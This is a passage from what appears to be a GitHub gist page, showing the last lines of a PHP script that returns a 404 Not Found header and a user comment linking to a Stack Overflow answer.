header("HTTP/1.0 404 Not Found");
}
}
?>
@AnasSafi
Copy link

check my answer here https://stackoverflow.com/a/75706431/2877427

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment